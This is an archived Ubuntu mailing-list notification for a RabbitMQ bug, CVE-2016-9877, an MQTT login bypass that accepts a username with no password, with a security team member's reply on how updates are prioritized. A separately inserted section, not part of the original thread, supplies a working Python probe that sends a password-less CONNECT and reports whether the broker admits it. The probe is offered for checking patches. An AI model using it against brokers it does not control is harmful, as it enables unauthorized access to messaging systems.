[Bug 1706900] Re: CVE-2016-9877 RabbitMQ authentication vulnerability

Seth Arnold 1706900 at bugs.launchpad.net
Tue Aug 1 02:32:16 UTC 2017


Hi Nils,

Ubuntu's security team does not use upstream assessments of
severity when assigning priorities. Our criteria are enumerated at
http://bazaar.launchpad.net/~ubuntu-security/ubuntu-cve-tracker/master/view/head:/README#L191 .

Upstream estimates of severity are usually focused strictly on the
service at hand while we need to prioritize our work across more than
ten thousand sources. This doesn't mean upstream severities are wrong,
but we must have some way to prioritize our work that's consistent.

The CVE tracker does indeed trigger the process of issuing security
updates. You can see this process at https://usn.ubuntu.com/usn/ where
we have issued 290 USNs so far this year. Less visible are the sponsored
updates to universe packages in collaboration with the community, which
do not get USNs.

We do not have service level agreements for security updates. Even
if such a thing were feasible for our team we believe this would be
counter-productive to overall security as many upstreams issue regression
fixes after security fixes get wider coverage.

Seven months for an issue with an upstream-provided patch is indeed too
long. We have recently hired a new team member; while his duties are
primarily providing extended support for 12.04 LTS to Ubuntu Advantage
customers, he will also perform additional updates and generalist duties
as time allows.

In addition, while it doesn't happen often, we are happy to sponsor
updates for packages in main. It would probably be best to check in with
us before beginning work on a sponsored update to ensure (a) that we'd be
interested in the approach and (b) that it wouldn't be duplicating work.
For more information see https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures.
This may help bring a specific update to our users more quickly.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to rabbitmq-server in Ubuntu.
https://bugs.launchpad.net/bugs/1706900

Title:
  CVE-2016-9877 RabbitMQ authentication vulnerability

Status in RabbitMQ:
  Fix Released
Status in rabbitmq-server package in Ubuntu:
  Fix Released
Status in rabbitmq-server source package in Trusty:
  Fix Released
Status in rabbitmq-server source package in Xenial:
  Fix Released

Bug description:
  https://pivotal.io/security/cve-2016-9877

  "MQTT (MQ Telemetry Transport) connection authentication with a
  username/password pair succeeds if an existing username is provided
  but the password is omitted from the connection request. Connections
  that use TLS with a client-provided certificate are not affected."

  Affects RabbitMQ "3.x versions prior to 3.5.8"

  Ubuntu's Xenial repos are currently offering 3.5.7-1ubuntu0.16.04.1,
  and according to its changelog, Pivotal's fix for CVE-2016-9877 has
  not been included.

To manage notifications about this bug go to:
https://bugs.launchpad.net/rabbitmq/+bug/1706900/+subscriptions
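The advisory quoted in the bug description turns on one detail of the MQTT CONNECT packet: the username and password flags are independent bits, so a client can legitimately send a username with no password field at all, and a broker must treat that as a failed password check rather than as "no password required". The script below is an added example, not code from the bug report, from RabbitMQ or from Pivotal. It builds an MQTT 3.1.1 CONNECT with the username flag set and the password flag clear, decodes the CONNACK return code, and (optionally) sends the probe to a broker so an administrator can confirm whether a patched package actually closed the hole. The host, port and username passed on the command line are assumptions; the probe expects a plain-TCP MQTT listener (the certificate-based TLS path the advisory says is unaffected is not exercised) and a username that exists on the broker.

```python
import socket
import struct
from typing import Optional


def _encode_string(s: str) -> bytes:
    """MQTT UTF-8 string: two-byte big-endian length prefix, then the bytes."""
    data = s.encode("utf-8")
    return struct.pack("!H", len(data)) + data


def _encode_remaining_length(n: int) -> bytes:
    """MQTT variable-length integer used for the fixed-header 'remaining length'."""
    out = bytearray()
    while True:
        digit = n % 128
        n //= 128
        if n > 0:
            digit |= 0x80  # continuation bit: more length bytes follow
        out.append(digit)
        if n == 0:
            return bytes(out)


def build_connect(client_id: str, username: Optional[str] = None,
                  password: Optional[str] = None, keepalive: int = 60) -> bytes:
    """Build an MQTT 3.1.1 CONNECT packet.

    Bits 7 (username) and 6 (password) of the connect-flags byte are set
    independently, so username="alice", password=None produces exactly the
    'username present, password omitted' request the advisory describes.
    """
    flags = 0x02  # clean session
    payload = _encode_string(client_id)
    if username is not None:
        flags |= 0x80
        payload += _encode_string(username)
    if password is not None:
        flags |= 0x40
        payload += _encode_string(password)
    variable_header = (_encode_string("MQTT")      # protocol name
                       + bytes([0x04, flags])      # protocol level 4, connect flags
                       + struct.pack("!H", keepalive))
    body = variable_header + payload
    return bytes([0x10]) + _encode_remaining_length(len(body)) + body


# CONNACK return codes from the MQTT 3.1.1 specification.
CONNACK_CODES = {
    0: "accepted",
    1: "unacceptable protocol version",
    2: "identifier rejected",
    3: "server unavailable",
    4: "bad user name or password",
    5: "not authorized",
}


def parse_connack(data: bytes) -> int:
    """Return the CONNACK return code, or raise if the bytes are not a CONNACK."""
    if len(data) < 4 or data[0] != 0x20 or data[1] != 0x02:
        raise ValueError("not a CONNACK: %r" % (data,))
    return data[3]


def probe(host: str, port: int, username: str, timeout: float = 5.0) -> str:
    """Send a CONNECT carrying a real username and no password; report the answer.

    'accepted' means the broker admits anyone who knows a username (the
    CVE-2016-9877 behaviour). Any other return code, or a closed socket, is
    what a fixed broker should produce. Requires network access.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect("cve-2016-9877-probe", username=username))
        data = sock.recv(4)
    if not data:
        return "connection closed without CONNACK"
    code = parse_connack(data)
    return CONNACK_CODES.get(code, "unknown return code %d" % code)


if __name__ == "__main__":
    import sys
    # Hypothetical invocation: python probe.py broker.example.org 1883 alice
    print(probe(sys.argv[1], int(sys.argv[2]), sys.argv[3]))
```

Run it against a broker before and after installing the updated package: a broker still running the unfixed code answers the password-less CONNECT with return code 0, while a fixed one rejects it. The packet builder is deliberately low-level (no MQTT client library) so that the password flag can be left clear, something most client libraries will not let you do.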



More information about the Ubuntu-openstack-bugs mailing list